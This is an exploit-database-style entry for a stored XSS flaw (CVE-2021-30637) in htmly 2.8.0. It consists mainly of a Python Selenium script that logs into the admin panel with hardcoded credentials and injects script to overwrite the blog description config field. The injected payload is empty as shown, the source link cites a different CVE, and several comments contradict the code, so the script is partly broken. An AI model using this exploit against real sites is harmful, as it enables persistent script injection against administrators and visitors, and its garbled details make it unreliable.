# Exploit Title: htmly 2.8.0 allows stored XSS # Authors: @nu11secur1ty & G.Dzhankushev # Date: 04.15.2021 # Vendor: htmly # Link: https://github.com/danpros/htmly # CVE: CVE-2021-30637 [+] Exploit Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929 [Exploit Program Code] #!/usr/bin/python3 # Authors: @nu11secur1ty, G,Dzhankushev # CVE-2021-30637 from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import time #enter the link to the website you want to automate login. website_link="http://localhost/htmly/login" #enter your login username username="nu11secur1ty" #enter your login password password="password" #enter the element for username input field element_for_username="user" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="submit" #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Firefox() #uncomment this line,for chrome users browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit .ini browser.get(("http://localhost/htmly/admin/config")) browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = ''") time.sleep(3) browser.execute_script("document.querySelector('.btn.btn-primary').click()") print("If everything is ok, please paste this code in to the Users in section First Name\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") --------------------------------- # Exploit Title: htmly 2.8.0 allows stored XSS # Date: 04.15.2021 # Exploit Authotr @nu11secur1ty # Exploit Debugging: G.Dzhankushev # Vendor Homepage: htmly # Software Link: https://github.com/danpros/htmly # Video: https://www.youtube.com/watch?v=xKRQZYqVlS4 # Steps to Reproduce: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-30637